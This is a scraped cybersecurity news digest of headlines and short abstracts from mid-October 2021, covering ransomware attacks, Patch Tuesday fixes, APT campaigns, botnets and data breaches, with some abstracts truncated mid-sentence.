Microsoft releases Linux version of the Windows Sysmon tool Full Text
Abstract
Microsoft has released a Linux version of the very popular Sysmon system monitoring utility for Windows, allowing Linux administrators to monitor devices for malicious activity.BleepingComputer
October 14, 2021 – Vulnerabilities
Intel, VMware Join Patch Tuesday Parade Full Text
Abstract
Intel released two advisories to fix privilege escalation and information disclosure vulnerabilities in the SGX software development kit and Hardware Accelerated Execution Manager software products.Security Week
October 14, 2021 – Government
World leaders recognize ransomware attacks as ‘global security threat’ Full Text
Abstract
Government cybersecurity leaders from the United States and more than 30 countries on Thursday formally recognized ransomware attacks as an "escalating global security threat,” and pledged greater cooperation and diplomacy in fighting against these incidents.The Hill
October 14, 2021 – Education
The Ultimate SaaS Security Posture Management (SSPM) Checklist Full Text
Abstract
Cloud security is the umbrella that holds within it: IaaS, PaaS and SaaS. Gartner created the SaaS Security Posture Management (SSPM) category for solutions that continuously assess security risk and manage the SaaS applications' security posture. With enterprises having 1,000 or more employees relying on dozens to hundreds of apps, the need for deep visibility and remediation for SaaS security settings is only getting more critical. The top pain points for SaaS security stem from: Lack of control over the growing SaaS app estate Lack of governance in the lifecycle of SaaS apps: from purchase to deployment, operation and maintenance Lack of visibility of all the configurations in SaaS app estate Skills gap in ever-evolving, accelerating, complex cloud security Laborious and overwhelming workload to stay on top of hundreds to thousands (to tens of thousands) of settings and permissions. The capability of governance across the whole SaaS estate is both nuanced and complThe Hacker News
October 14, 2021 – General
Since 2020, at least 130 different ransomware families have been active Full Text
Abstract
The popular Google’s VirusTotal scanning service has published an interesting analysis of more than 80 Million ransomware samples. VirusTotal has published its first ransomware activity report based on the analysis of more than 80 million samples...Security Affairs
October 14, 2021 – General
Podcast: 67% of Orgs Have Been Hit by Ransomware at Least Once Full Text
Abstract
Fortinet’s Derek Manky discusses a recent global survey showing that two-thirds of organizations suffered at least one ransomware attack, while half were hit multiple times.Threatpost
October 14, 2021 – Outage
University of Sunderland announces outage following cyberattack Full Text
Abstract
The University of Sunderland in the UK has announced extensive operational issues that have taken most of its IT systems down, attributing the problem to a cyber-attack.BleepingComputer
October 14, 2021 – Business
Cyber Insurance Firm At-Bay Announces $20 Million Series D Extension Full Text
Abstract
The new injection of capital came from ION Crossover Partners, which joins Series D investors Icon Ventures, Lightspeed Venture Partners, Acrew Capital, Khosla Ventures, and M12, and others.Security Week
October 14, 2021 – Government
House Democrats announce bill to rein in tech algorithms Full Text
Abstract
Top Democrats on the House Energy and Commerce Committee on Thursday announced legislation aimed at holding online platforms accountable for content promoted by their algorithms.The Hill
October 14, 2021 – Vulnerabilities
Critical Remote Hacking Flaws Disclosed in Linphone and MicroSIP Softphones Full Text
Abstract
Multiple security vulnerabilities have been disclosed in softphone software from Linphone and MicroSIP that could be exploited by an unauthenticated remote adversary to crash the client and even extract sensitive information like password hashes by simply making a malicious call. The vulnerabilities, which were discovered by Moritz Abrell of German pen-testing firm SySS GmbH, have since been addressed by the respective manufacturers following responsible disclosure. Softphones are essentially software-based phones that mimic desk phones and allow for making telephone calls over the Internet without the need for using dedicated hardware. At the core of the issues are the SIP services offered by the clients to connect two peers to facilitate telephony services in IP-based mobile networks. SIP aka Session Initiation Protocol is a signaling protocol that's used to control interactive communication sessions, such as voice, video, chat and instant messaging, as well as games and vThe Hacker News
October 14, 2021 – General
Google sent over 50,000 warnings of state-sponsored attacks, +33% from same period in 2020 Full Text
Abstract
Google revealed to have sent roughly 50,000 alerts of state-sponsored phishing or hacking attempts to customers since January. Google announced to have sent roughly 50,000 alerts of state-sponsored phishing or hacking attempts to customers during...Security Affairs
October 14, 2021 – Phishing
DocuSign phishing campaign targets low-ranking employees Full Text
Abstract
Phishing actors are following a new trend of targeting non-executive employees but who still have access to valuable areas within an organization.BleepingComputer
October 14, 2021 – Phishing
“Free Steam game” scams on TikTok are Among Us Full Text
Abstract
The scammers are claiming to offer up free versions of the incredibly popular Among Us game. However, they also claim to have special hacked versions up for grabs that allow players to cheat.Malwarebytes Labs
October 14, 2021 – General
VirusTotal Releases Ransomware Report Based on Analysis of 80 Million Samples Full Text
Abstract
As many as 130 different ransomware families have been found to be active in 2020 and the first half of 2021, with Israel, South Korea, Vietnam, China, Singapore, India, Kazakhstan, Philippines, Iran, and the U.K. emerging as the most affected territories, a comprehensive analysis of 80 million ransomware-related samples has revealed. Google's cybersecurity arm VirusTotal attributed a significant chunk of the activity to the GandCrab ransomware-as-a-service (RaaS) group (78.5%), followed by Babuk (7.61%), Cerber (3.11%), Matsnu (2.63%), Wannacry (2.41%), Congur (1.52%), Locky (1.29%), Teslacrypt (1.12%), Rkor (1.11%), and Reveon (0.70%). "Attackers are using a range of approaches, including well-known botnet malware and other Remote Access Trojans (RATs) as vehicles to deliver their ransomware," VirusTotal Threat Intelligence Strategist Vicente Diaz said . "In most cases, they are using fresh or new ransomware samples for their campaigns." Some of the othThe Hacker News
October 14, 2021 – Attack
For the first time, an Israeli hospital was hit by a major ransomware attack Full Text
Abstract
The Hillel Yaffe Medical Center in Hadera, Israel, was hit by a ransomware attack that was defined by Israel's National Cyber Directorate as a "major" attack. The Hillel Yaffe Medical Center in Hadera, Israel was hit by a ransomware attack that impacted...Security Affairs
October 14, 2021 – General
Google sent 50,000 warnings of state-sponsored attacks in 2021 Full Text
Abstract
Google said today that it sent roughly 50,000 alerts of state-sponsored phishing or hacking attempts to customers during 2021, a considerable increase compared to the previous year.BleepingComputer
October 14, 2021 – Breach
Data of 228,000 Subscribers of Thingiverse Circulated on Hacker Forum Full Text
Abstract
Thingiverse, a site for sharing user-created digital design files, has reportedly leaked a 36GB backup file that contains 228,000 unique email addresses and other personally identifiable information.Info Risk Today
October 14, 2021 – Vulnerabilities
Experts Warn of Unprotected Prometheus Endpoints Exposing Sensitive Information Full Text
Abstract
A large-scale unauthenticated scraping of publicly available and non-secured endpoints from older versions of Prometheus event monitoring and alerting solution could be leveraged to inadvertently leak sensitive information, according to the latest research. "Due to the fact that authentication and encryption support is relatively new, many organizations that use Prometheus haven't yet enabled these features and thus many Prometheus endpoints are completely exposed to the Internet (e.g. endpoints that run earlier versions), leaking metric and label dat," JFrog researchers Andrey Polkovnychenko and Shachar Menashe said in a report. Prometheus is an open-source system monitoring and alerting toolkit used to collect and process metrics from different endpoints, alongside enabling easy observation of software metrics such as memory usage, network usage, and software-specific defined metrics, such as the number of failed logins to a web application. Support for TransportThe Hacker News
October 14, 2021 – Breach
Acer suffered the second security breach in a few months Full Text
Abstract
Taiwanese electronics technology giant Acer discloses a security breach suffered by its after-sales service systems in India after an isolated attack. Bad news for the Taiwanese electronics technology giant Acer, it disclosed a second security breach...Security Affairs
October 14, 2021 – Malware
Malicious Chrome ad blocker injects ads behind the scenes Full Text
Abstract
The AllBlock Chromium ad blocking extension has been found to be injecting hidden affiliate links that generate commissions for the developers.BleepingComputer
October 14, 2021 – Botnet
Trickbot Continues to Stay Strong Despite the Recent Arrest of Gang Members Full Text
Abstract
Ever since its re-emergence following the major takedown in 2020, the operators have released new and more persistent versions of the malware to claim successful attacks on victims.Cyware Alerts - Hacker News
October 14, 2021 – Attack
New Yanluowang ransomware used in highly targeted attacks on large orgs Full Text
Abstract
Researchers spotted a new strain of ransomware, dubbed Yanluowang, that was used in highly targeted attacks against enterprises. Researchers from Symantec Threat Hunter Team discovered a ransomware family, tracked as Yanluowang ransomware that was used...Security Affairs
October 14, 2021 – Breach
Acer confirms breach of after-sales service systems in India Full Text
Abstract
Taiwanese computer giant Acer has confirmed that its after-sales service systems in India were recently breached in what the company called "an isolated attack."BleepingComputer
October 14, 2021 – Botnet
Freakout Botnet Unleashes a New Bunch of Attacks Full Text
Abstract
Towards the end of September 2021, researchers at Juniper Threat Labs observed new activity from FreakOut aka 3Cr0m0rPh that resulted in the takeover of Visual Tools DVR.Cyware Alerts - Hacker News
October 14, 2021 – Attack
New Yanluowang ransomware used in targeted enterprise attacks Full Text
Abstract
A new and still under development ransomware strain is being used in highly targeted attacks against enterprise entities as Broadcom's Symantec Threat Hunter Team discovered.BleepingComputer
October 13, 2021 – Cryptocurrency
OpenSea ‘Free Gift’ NFTs Drain Cryptowallet Balances Full Text
Abstract
Cybercriminals exploited bugs in the world’s largest digital-goods marketplace to create malicious artwork offered as a perk to unsuspecting users.Threatpost
October 13, 2021 – Botnet
MyKings botnet still active and making massive amounts of money Full Text
Abstract
The MyKings botnet (aka Smominru or DarkCloud) is still actively spreading, making massive amounts of money in crypto, five years after it first appeared in the wild.BleepingComputer
October 13, 2021 – Malware
New FontOnLake Malware Cripples Linux Systems Full Text
Abstract
ESET unearthed a new malware strain, dubbed FontOnLake, that targets Linux systems and appears to have claimed a limited number of victims in Southeast Asia. The malware appears to boast sneaky nature and advanced designs. Security teams are suggested to proactively prepare their defenses against ... Read MoreCyware Alerts - Hacker News
October 13, 2021 – Education
Johns Hopkins to launch degree program in cybersecurity and policy Full Text
Abstract
The Johns Hopkins University School of Advanced International Studies on Wednesday announced plans to launch an advanced academic program focused on the intersection of cybersecurity, technology, intelligence and international affairs.The Hill
October 13, 2021 – Vulnerabilities
Critical Flaw in OpenSea Could Have Let Hackers Steal Cryptocurrency From Wallets Full Text
Abstract
A now-patched critical vulnerability in OpenSea, the world's largest non-fungible token ( NFT ) marketplace, could've been abused by malicious actors to drain cryptocurrency funds from a victim by sending a specially-crafted token, opening a new attack vector for exploitation. The findings come from cybersecurity firm Check Point Research, which began an investigation into the platform following public reports of stolen cryptocurrency wallets triggered by free airdropped NFTs. The issues were fixed in less than one hour of responsible disclosure on September 26, 2021. "Left unpatched, the vulnerabilities could allow hackers to hijack user accounts and steal entire cryptocurrency wallets by crafting malicious NFTs," Check Point researchers said . As the name indicates, NFTs are unique digital assets such as photos, videos, audio, and other items that can be sold and traded on the blockchain, using the technology as a certificate of authenticity to establish a verThe Hacker News
October 13, 2021 – Vulnerabilities
Apple silently fixed iOS zero-day without crediting the expet who reported it Full Text
Abstract
Apple has silently addressed a zero-day vulnerability that could allow attackers to gain access to sensitive user data. Apple has silently addressed zero-day vulnerability with the release of iOS 15.0.2, the vulnerability could allow attackers gain...Security Affairs
October 13, 2021 – Botnet
FreakOut Botnet Turns DVRs Into Monero Cryptominers Full Text
Abstract
The new Necro Python exploit targets Visual Tool DVRs used in surveillance systems.Threatpost
October 13, 2021 – Vulnerabilities
Apple silently fixes iOS zero-day, asks bug reporter to keep quiet Full Text
Abstract
Apple has silently fixed a gamed zero-day vulnerability with the release of iOS 15.0.2, on Monday, a security flaw that could let attackers gain access to sensitive user information.BleepingComputer
October 13, 2021 – APT
APT28 Launches Spearphishing Campaign Against Gmail Users: Google Warns Full Text
Abstract
Google warned against phishing attempts by APT28 impacting nearly 14,000 Gmail users, especially activists, journalists, and government officials as they are the key targets of state-sponsored hacks. However, there were no confirmed reports of compromised Gmail accounts.Cyware Alerts - Hacker News
October 13, 2021 – General
Lawmakers, security experts call for beefing up cybersecurity Full Text
Abstract
Lawmakers and national security experts said Tuesday that the U.S. needs to take bigger steps at the government level and in the private sector to guard against ransomware attacks.The Hill
October 13, 2021 – Education
[eBook] The Guide for Reducing SaaS Applications Risk for Lean IT Security Teams Full Text
Abstract
The Software-as-a-service (SaaS) industry has gone from novelty to an integral part of today's business world in just a few years. While the benefits to most organizations are clear – more efficiency, greater productivity, and accessibility – the risks that the SaaS model poses are starting to become visible. It's not an overstatement to say that most companies today run on SaaS. This poses an increasing challenge to their security teams. A new guide from XDR and SSPM provider Cynet, titled The Guide for Reducing SaaS Applications Risk for Lean IT Security Teams ( download here ), breaks down exactly why SaaS ecosystems are so risky, and how security teams can mitigate those dangers. Today, the average midsize company uses 185 SaaS apps. What this means is that the number of app-to-person connections has risen exponentially. Most midsize companies have nearly 4,406 touch points, creating an attack surface that requires significant resources to simply monitor. The risk of a digitalThe Hacker News
October 13, 2021 – Criminals
MyKings botnet operators already amassed at least $24 million Full Text
Abstract
The MyKings botnet (aka Smominru or DarkCloud) is still alive and continues to spread, allowing its operators to make huge amounts of money. Avast Threat Labs researchers reported that the MyKings botnet (aka Smominru or DarkCloud) is still alive and...Security Affairs
October 13, 2021 – Malware
Brizy WordPress Plugin Exploit Chains Allow Full Site Takeovers Full Text
Abstract
A stored XSS and arbitrary file-upload bug can be paired with an authorization bypass to wreak havoc.Threatpost
October 13, 2021 – Government
Australia to tackle ransomware data breaches by deleting stolen files Full Text
Abstract
Australia's Minister for Home Affairs has announced the "Australian Government's Ransomware Action Plan," which is a set of new measures the country will adopt in an attempt to tackle the rising threat.BleepingComputer
October 13, 2021 – Vulnerabilities
Two Flaws in Apache Servers are Under Attack Full Text
Abstract
Apache, the open-source cross-platform web server software, rolled out patches to fix two security vulnerabilities that were being abused by criminals. While the first flaw can be exploited for RCE, the other moderate flaw can enable DoS attacks on the server. Experts recommend following proper pat ... Read MoreCyware Alerts - Hacker News
October 13, 2021 – Government
World leaders call for enhanced cooperation to fight escalating wave of ransomware attacks Full Text
Abstract
A coalition of leaders from around 30 nations kicked off a White House-led summit on countering ransomware attacks Wednesday by calling for increased international cooperation to fight these incidents.The Hill
October 13, 2021 – Denial Of Service
Dutch police warn customers of a popular DDoS booter service Full Text
Abstract
Dutch police warn customers of a distributed denial-of-service (DDoS) website of stopping using the service to avoid prosecution. Dutch police warn customers of a booter service, abused to carry out distributed denial-of-service (DDoS) attacks, of to stop...Security Affairs
October 13, 2021 – General
Mandating a Zero-Trust Approach for Software Supply Chains Full Text
Abstract
Sounil Yu, CISO at JupiterOne, discusses software bills of materials (SBOMs) and the need for a shift in thinking about securing software supply chains.Threatpost
October 13, 2021 – Attack
Verizon digital carrier Visible customer accounts were hacked Full Text
Abstract
Visible, a US digital wireless carrier owned by Verizon, admitted that some customer accounts were hacked after dealing with technical problems in the past couple of days.BleepingComputer
October 13, 2021 – Insider Threat
Former Executive Accessed PHI of Nearly 38,000 Individuals Full Text
Abstract
A compromise of sensitive health information at Premier Patient Healthcare affecting nearly 38,000 individuals was discovered nearly a year after a terminated company executive accessed the data.Gov Info Security
October 13, 2021 – Government
Russia excluded from virtual White House meeting on ransomware Full Text
Abstract
The White House on Wednesday will convene a virtual meeting on countering ransomware with senior officials representing 30 countries and the European Union, Biden administration officials said, as part of President Biden’s effort to work with global partners to address cyber threats.The Hill
October 13, 2021 – Phishing
Crooks use math symbols to evade anti-phishing solutions Full Text
Abstract
Threat actors are using mathematical symbols on impersonated company logos to evade detection in phishing campaigns. Researchers from anti-phishing cybersecurity firm INKY have detailed a new technique to evade detection in phishing attacks, it leverages...Security Affairs
October 13, 2021 – Vulnerabilities
OpenSea NFT platform bugs let hackers steal crypto wallets Full Text
Abstract
Security researchers found that an attacker could leave OpenSea account owners with an empty cryptocurrency balance by luring them to click on malicious NFT art.BleepingComputer
October 13, 2021 – Government
UK Cybersecurity Agency Releases New BYOD Guidance Full Text
Abstract
The United Kingdom's National Cyber Security Center has published an updated guidance for employees using their personal devices for work, amid a prolonged work-from-home setting.Info Risk Today
October 13, 2021 – Government
Russia and China left out of global anti-ransomware meetings Full Text
Abstract
The White House National Security Council facilitates virtual meetings this week with senior officials and ministers from more than 30 countries in a virtual international counter-ransomware event to rally allies in the fight against the ransomware threat.BleepingComputer
October 13, 2021 – Vulnerabilities
Siemens and Schneider Electric Address Over 50 Vulnerabilities for Patch Tuesday Full Text
Abstract
Industrial giants Siemens and Schneider Electric on Tuesday released nearly a dozen security advisories describing a total of more than 50 vulnerabilities affecting their products.Security Week
October 13, 2021 – Business
MITRE launches two organizations to protect critical infrastructure and clinical health data Full Text
Abstract
MITRE has created two new organizations intended to help the company better focus on cybersecurity threats to critical infrastructure and new approaches to public health challenges.Help Net Security
October 13, 2021 – APT
Chinese APT IronHusky use Win zero-day in recent wave of attacks Full Text
Abstract
A Chinese-speaking hacking group exploited a Windows zero-day vulnerability in a wave of attacks on defense and IT businesses. A Chinese-speaking hacking group exploited a zero-day vulnerability in the Windows Win32k kernel driver to deploy a new remote...Security Affairs
October 12, 2021 – Denial Of Service
Dutch police send warning letters to DDoS booter customers Full Text
Abstract
Dutch authorities gave a final warning to more than a dozen customers of a distributed denial-of-service (DDoS) website, letting them know that continued cyber offenses lead to prosecution.BleepingComputer
October 12, 2021 – APT
New Iranian APT Targets Aerospace and Telecoms in Western Countries Full Text
Abstract
A cyberespionage operation by MalKamak, an Iran-based hacker group, is targeting aerospace and telecom firms based in the Middle East, Russia, the U.S., and Europe. MalKamak, which uses ShellClient RAT, has targeted only a small number of targets since its alleged inception in 2018. Security team ... Read MoreCyware Alerts - Hacker News
October 12, 2021 – Business
Google creates cybersecurity team to respond to increased hacks Full Text
Abstract
Google on Tuesday announced the creation of a new cybersecurity team to help respond to attacks against governments and other critical groups, along with a new program to help strengthen the cybersecurity of businesses.The Hill
October 12, 2021 – Vulnerabilities
Update Your Windows PCs Immediately to Patch New 0-Day Under Active Attack Full Text
Abstract
Microsoft on Tuesday rolled out security patches to contain a total of 71 vulnerabilities in Microsoft Windows and other software, including a fix for an actively exploited privilege escalation vulnerability that could be exploited in conjunction with remote code execution bugs to take control over vulnerable systems. Two of the addressed security flaws are rated Critical, 68 are rated Important, and one is rated Low in severity, with three of the issues listed as publicly known at the time of the release. The four zero-days are as follows — CVE-2021-40449 (CVSS score: 7.8) - Win32k Elevation of Privilege Vulnerability CVE-2021-41335 (CVSS score: 7.8) - Windows Kernel Elevation of Privilege Vulnerability CVE-2021-40469 (CVSS score: 7.2) - Windows DNS Server Remote Code Execution Vulnerability CVE-2021-41338 (CVSS score: 5.5) - Windows AppContainer Firewall Rules Security Feature Bypass Vulnerability At the top of the list is CVE-2021-40449, a use-after-free vulnerabilityThe Hacker News
October 12, 2021 – Privacy
Office 365 Spy Campaign Targets US Military Defense Full Text
Abstract
An Iran-linked group is taking aim at makers of drones and satellites, Persian Gulf ports and maritime shipping companies, among others.Threatpost
October 12, 2021 – Hacker
Chinese hackers use Windows zero-day to attack defense, IT firms Full Text
Abstract
A Chinese-speaking hacking group exploited a zero-day vulnerability in the Windows Win32k kernel driver to deploy a previously unknown remote access trojan (RAT).BleepingComputer
October 12, 2021 – Malware
There is Lot More About Fake iTerm2 Apps than Thought Earlier Full Text
Abstract
Trend Micro sheds light on the ZuRu malware campaign that collects private data from a victim’s machine. Further analysis of the fake iTerm2 app’s Apple Distribution certificate led to the discovery of more trojanized apps on VirusTotal. S tay vigilant while downloading software online from untrus ... Read MoreCyware Alerts - Hacker News
October 12, 2021 – Government
Congress looks to strengthen government’s aging cyber infrastructure Full Text
Abstract
Congress is working to funnel resources to beef up state and local government cybersecurity infrastructure after the COVID-19 pandemic forced municipalities to move many essential operations to aging and vulnerable online sources.The Hill
October 12, 2021 – Vulnerabilities
Digital Signature Spoofing Flaws Uncovered in OpenOffice and LibreOffice Full Text
Abstract
The maintainers of LibreOffice and OpenOffice have shipped security updates to their productivity software to remediate multiple vulnerabilities that could be weaponized by malicious actors to alter documents to make them appear as if they are digitally signed by a trusted source. The list of the three flaws is as follows — CVE-2021-41830 / CVE-2021-25633 - Content and Macro Manipulation with Double Certificate Attack CVE-2021-41831 / CVE-2021-25634 - Timestamp Manipulation with Signature Wrapping CVE-2021-41832 / CVE-2021-25635 - Content Manipulation with Certificate Validation Attack Successful exploitation of the vulnerabilities could permit an attacker to manipulate the timestamp of signed ODF documents, and worse, alter the contents of a document or self-sign a document with an untrusted signature, which is then tweaked to change the signature algorithm to an invalid or unknown algorithm. In both the latter two attack scenarios — stemming as a result oThe Hacker News
October 12, 2021 – Botnet
Necro botnet now targets Visual Tools DVRs Full Text
Abstract
The FreakOut (aka Necro, N3Cr0m0rPh) Python botnet evolves, it now includes a recently published PoC exploit for Visual Tools DVR. Operators behind the FreakOut (aka Necro, N3Cr0m0rPh) Python botnet have added a PoC exploit for Visual Tools DVR,...Security Affairs
October 12, 2021 – Vulnerabilities
PyPI removes ‘mitmproxy2’ over code execution concerns Full Text
Abstract
The PyPI repository has removed a Python package called 'mitmproxy2' that was an identical copy of the official "mitmproxy" library, but with an "artificially introduced" code execution vulnerability. The 'mitmproxy' Python package is a free and open-source interactive HTTPS proxyBleepingComputer
October 12, 2021 – Malware
New UEFI Bootkit Performs Espionage Full Text
Abstract
A new ESPecter bootkit was uncovered that performs cyberespionage and compromises system partitions. There are signs in the malware's components that revealed that the attackers could be Chinese-speaking. For protection, experts suggest ensuring security patches quickly.Cyware Alerts - Hacker News
October 12, 2021 – Vulnerabilities
GitHub Revoked Insecure SSH Keys Generated by a Popular git Client Full Text
Abstract
Code hosting platform GitHub has revoked weak SSH authentication keys that were generated via the GitKraken git GUI client due to a vulnerability in a third-party library that increased the likelihood of duplicated SSH keys. As an added precautionary measure, the Microsoft-owned company also said it's building safeguards to prevent vulnerable versions of GitKraken from adding newly generated weak keys. The problematic dependency, called " keypair ," is an open-source SSH key generation library that allows users to create RSA keys for authentication-related purposes. It has been found to impact GitKraken versions 7.6.x, 7.7.x, and 8.0.0, released between May 12, 2021, and September 27, 2021. The flaw — tracked as CVE-2021-41117 (CVSS score: 8.7) — concerns a bug in the pseudo-random number generator used by the library, resulting in the creation of a weaker form of public SSH keys, which, owing to their low entropy — i.e., the measure of randomness — could boostThe Hacker News
October 12, 2021 – Vulnerabilities
Adobe addresses four critical flaws in its products Full Text
Abstract
Adobe addressed ten vulnerabilities across its Acrobat and Reader, Connect, Commerce, and Campaign Standard products. Adobe has released security updates to address ten vulnerabilities across its Acrobat and Reader, Connect, Commerce, and Campaign...Security Affairs
October 12, 2021 – Vulnerabilities
Microsoft October 2021 Patch Tuesday fixes 4 zero-days, 71 flaws Full Text
Abstract
Today is Microsoft's October 2021 Patch Tuesday, and with it comes fixes for four zero-day vulnerabilities and a total of 74 flaws.BleepingComputer
October 12, 2021 – APT
Research Links Multiple Attack Campaigns to APT41 Group Full Text
Abstract
Blackberry revealed three phishing schemes by APT41 that were targeting multiple sectors in India using COVID-19-themed phishing baits. Some of the phishing emails included information related to the latest income tax legislation targeting residents not living in India. Security teams need to ... Read MoreCyware Alerts - Hacker News
October 12, 2021 – Denial Of Service
Microsoft Fended Off a Record 2.4 Tbps DDoS Attack Targeting Azure Customers Full Text
Abstract
Microsoft on Monday revealed that its Azure cloud platform mitigated a 2.4 Tbps distributed denial-of-service (DDoS) attack in the last week of August targeting an unnamed customer in Europe, surpassing a 2.3 Tbps attack stopped by Amazon Web Services in February 2020. "This is 140 percent higher than 2020's 1 Tbps attack and higher than any network volumetric event previously detected on Azure," Amir Dahan, senior program manager for Azure Networking, said in a post, calling it a " UDP reflection " lasting for about 10 minutes. Reflected amplification attacks are a type of denial of service attacks wherein a threat actor takes advantage of the connectionless nature of UDP protocol with spoofed requests so as to overwhelm a target server or network with a flood of packets, causing disruption or rendering the server and its surrounding infrastructure unavailable. The attack is said to have originated from a botnet of approximately 70,000 compromised dThe Hacker News
October 12, 2021 – Outage
Olympus US was forced to take down computer systems due to cyberattack Full Text
Abstract
Olympus US was forced to take down IT systems in the American region (U.S., Canada, and Latin America) following a cyberattack. The medical technology giant Olympus was forced to shut down its computer network in America (U.S., Canada, and Latin...Security Affairs
October 12, 2021 – Botnet
FreakOut botnet now attacks vulnerable video DVR devices Full Text
Abstract
A new update to the FreakOut (aka Necro, N3Cr0m0rPh) Python botnet has added a recently published PoC exploit for Visual Tools DVR in its arsenal to further aid in breaching systems.BleepingComputer
October 12, 2021 – General
Ransomware cost US companies almost $21 billion in downtime in 2020 Full Text
Abstract
An analysis by Comparitech of 186 successful ransomware attacks against businesses in the United States in 2020 has shown that the companies lost almost US$21 billion due to attack-induced downtime.ESET Security
October 12, 2021 – Vulnerabilities
GitKraken flaw lead to the generation of weak SSH keys Full Text
Abstract
Git GUI client GitKraken team fixed a flaw that lead to the generation of weak SSH keys, users are recommended to revoke and renew their keys. The development team behind the Git GUI client GitKraken has fixed a vulnerability that was leading to the generation...Security Affairs
October 12, 2021 – Outage
Cyberattack shuts down Ecuador’s largest bank, Banco Pichincha Full Text
Abstract
Ecuador's largest private bank Banco Pichincha has suffered a cyberattack that disrupted operations and taken the ATM and online banking portal offline.BleepingComputer
October 12, 2021 – Vulnerabilities
InHand Router Flaws Could Expose Many Industrial Companies to Remote Attacks Full Text
Abstract
Several serious vulnerabilities discovered by researchers in industrial routers made by InHand Networks could expose many organizations to remote attacks, and patches do not appear to be available.Security Week
October 12, 2021 – Denial Of Service
Microsoft mitigated a record 2.4 Tbps DDoS attack in August Full Text
Abstract
Microsoft Azure cloud service mitigated a massive DDoS attack of 2.4 terabytes per second (Tbps) at the end of August, it is the largest DDoS attack to date. Microsoft announced that its Azure cloud service mitigated a 2.4 terabytes per second (Tbps)...Security Affairs
October 12, 2021 – Privacy
Study reveals Android phones constantly snoop on their users Full Text
Abstract
A new study by a team of university researchers in the UK has unveiled a host of privacy issues that arise from using Android smartphones.BleepingComputer
October 12, 2021 – General
Inside Apple: How macOS attacks are evolving Full Text
Abstract
Transparency, Consent, and Control (TCC) is a system for requiring user consent to access certain data, via prompts confirming that the user is okay with an app accessing that data.Malwarebytes Labs
October 12, 2021 – Hacker
SnapMC hackers skip file encryption and just steal your files Full Text
Abstract
A new actor tracked as SnapMC has emerged in the cybercrime space, performing the typical data-stealing extortion that underpins ransomware operations, but without doing any file encryption.BleepingComputer
October 12, 2021 – Vulnerabilities
Vulnerabilities Expose exacqVision Video Surveillance Systems to Remote Attacks Full Text
Abstract
Researchers at Tenable discovered critical and high-severity vulnerabilities in video surveillance systems made by Exacq Technologies, which is owned by building technology giant Johnson Controls.Security Week
October 12, 2021 – Vulnerabilities
Microsoft revokes insecure SSH keys for Azure DevOps customers Full Text
Abstract
Microsoft revoked insecure SSH keys some Azure DevOps have generated using a GitKraken git GUI client version impacted by an underlying issue found in one of its dependencies.BleepingComputer
October 12, 2021 – Business
Forcepoint To Acquire Cloud Security Startup Bitglass Full Text
Abstract
Forcepoint said it has reached a deal to acquire cloud security startup Bitglass. The deal is expected to close later this year. The financial terms of the deal were not disclosed.CRN
October 12, 2021 – Attack
Olympus US systems hit by cyberattack over the weekend Full Text
Abstract
Olympus, a leading medical technology company, was forced to take down IT systems in the Americas (U.S., Canada and Latin America) following a cyberattack that hit its network Sunday, on October 10, 2021.BleepingComputer
October 12, 2021 – Denial Of Service
Microsoft: Azure customer hit by record DDoS attack in August Full Text
Abstract
Microsoft has mitigated a record 2.4 Tbps (terabits per second) Distributed Denial-of-Service (DDoS) attack targeting an European Azure customer during the last week of August.BleepingComputer
October 12, 2021 – Malware
Photo editor Android app STILL sitting on Google Play store is malware Full Text
Abstract
An Android app sitting on the Google Play store touts itself to be a photo editor app. But, it contains code that steals the user's Facebook credentials to potentially run ad campaigns on the user's behalf, with their payment information. The app has scored over 5K installs, with similar spyware apps having 500K+ installs.BleepingComputer
October 12, 2021 – Government
NSA warns of wildcard certificate risks, provides mitigations Full Text
Abstract
The U.S. National Security Agency (NSA) is warning of the dangers stemming from the use of broadly-scoped certificates to authenticate multiple servers in an organization. These include a recently disclosed ALPACA technique that could be used for various traffic redirect attacks.BleepingComputer
October 11, 2021 – Hacker
Microsoft Warns of Iran-Linked Hackers Targeting US and Israeli Defense Firms Full Text
Abstract
An emerging threat actor likely supporting Iranian national interests has been behind a password spraying campaign targeting US, EU, and Israeli defense technology companies, with additional activity observed against regional ports of entry in the Persian Gulf as well as maritime and cargo transportation companies focused in the Middle East. Microsoft is tracking the hacking crew under the moniker DEV-0343 . The intrusions, which were first observed in late July 2021, are believed to have targeted more than 250 Office 365 tenants, fewer than 20 of which were successfully compromised following a password spray attack — a type of brute force attack wherein the same password is cycled against different usernames to log into an application or a network in an effort to avoid account lockouts. Indications thus far allude to the possibility that the activity is part of an intellectual property theft campaign aimed at government partners producing military-grade radars, drone technologyThe Hacker News
October 11, 2021 – Botnet
Ukraine Arrests Operator of DDoS Botnet with 100,000 Compromised Devices Full Text
Abstract
Ukrainian law enforcement authorities on Monday disclosed the arrest of a hacker responsible for the creation and management of a "powerful botnet" consisting of over 100,000 enslaved devices that was used to carry out distributed denial-of-service (DDoS) and spam attacks on behalf of paid customers. The unnamed individual, from the Ivano-Frankivsk region of the country, is also said to have leveraged the automated network to detect vulnerabilities in websites and break into them as well as stage brute-force attacks in order to guess email passwords. The Ukrainian police agency said it conducted a raid of the suspect's residence and seized their computer equipment as evidence of illegal activity. "He looked for customers on the closed forums and Telegram chats and payments were made via blocked electronic payment systems," the Security Service of Ukraine (SSU) said in a press statement. The payments were facilitated via WebMoney, a Russian money transfer pThe Hacker News
October 11, 2021 – Vulnerabilities
Apple Releases Urgent iPhone and iPad Updates to Patch New Zero-Day Vulnerability Full Text
Abstract
Apple on Monday released a security update for iOS and iPad to address a critical vulnerability that it says is being exploited in the wild, making it the 17th zero-day flaw the company has addressed in its products since the start of the year.' The weakness, assigned the identifier CVE-2021-30883 , concerns a memory corruption issue in the "IOMobileFrameBuffer" component that could allow an application to execute arbitrary code with kernel privileges. Crediting an anonymous researcher for reporting the vulnerability, Apple said it's "aware of a report that this issue may have been actively exploited." Technical specifics about the flaw and the nature of the attacks remain unavailable as yet, as is the identity of the threat actor, so as to allow a majority of the users to apply the patch and prevent other adversaries from weaponizing the vulnerability. The iPhone maker said it addressed the issue with improved memory handling. Security researcher SaarThe Hacker News
October 11, 2021 – Vulnerabilities
GitHub revokes duplicate SSH auth keys linked to library bug Full Text
Abstract
GitHub has revoked weak SSH authentication keys generated using a library that incorrectly created duplicate RSA keypairs.BleepingComputer
October 11, 2021 – Criminals
When criminals go corporate: Ransomware-as-a-service Full Text
Abstract
In many cases, the groups work on an affiliate model, with the developers taking a cut of the ransom on top of the monthly payment, generally to the tune of around 20 to 50 percent.The Register
October 11, 2021 – Hacker
Microsoft reports Iranian hackers targeting US, Israeli defense companies Full Text
